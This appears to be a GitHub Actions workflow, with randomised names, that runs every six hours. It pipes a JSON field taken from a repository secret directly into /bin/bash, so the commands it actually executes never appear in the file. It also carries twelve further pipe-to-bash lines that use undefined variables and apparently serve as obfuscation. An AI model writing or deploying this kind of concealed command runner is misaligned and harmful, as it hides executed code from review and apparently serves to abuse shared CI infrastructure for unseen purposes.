name: taoshiwang1234

on:
  workflow_dispatch:
  schedule:
    - cron: '49 0/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: taoshiwang1234
        env:
          pr681: ${{ secrets.pr681 }}
        run: |
          echo $pr681 | jq -r .ylpv8034 | /bin/bash
          echo $djt1 | jq -r .vnn85550 | /bin/bash
          echo $vik0 | jq -r .nh50383 | /bin/bash
          echo $cgf6 | jq -r .gz493 | /bin/bash
          echo $xir0462 | jq -r .p6258 | /bin/bash
          echo $yh80 | jq -r .ai951 | /bin/bash
          echo $aznu24314 | jq -r .vi0 | /bin/bash
          echo $bb7 | jq -r .mibhb32 | /bin/bash
          echo $tzr4254 | jq -r .n35 | /bin/bash
          echo $zbljz7 | jq -r .o6502 | /bin/bash
          echo $sjby625 | jq -r .l574 | /bin/bash
          echo $wnw41755 | jq -r .c5510 | /bin/bash
          echo $kovw915 | jq -r .kqfz2209 | /bin/bash

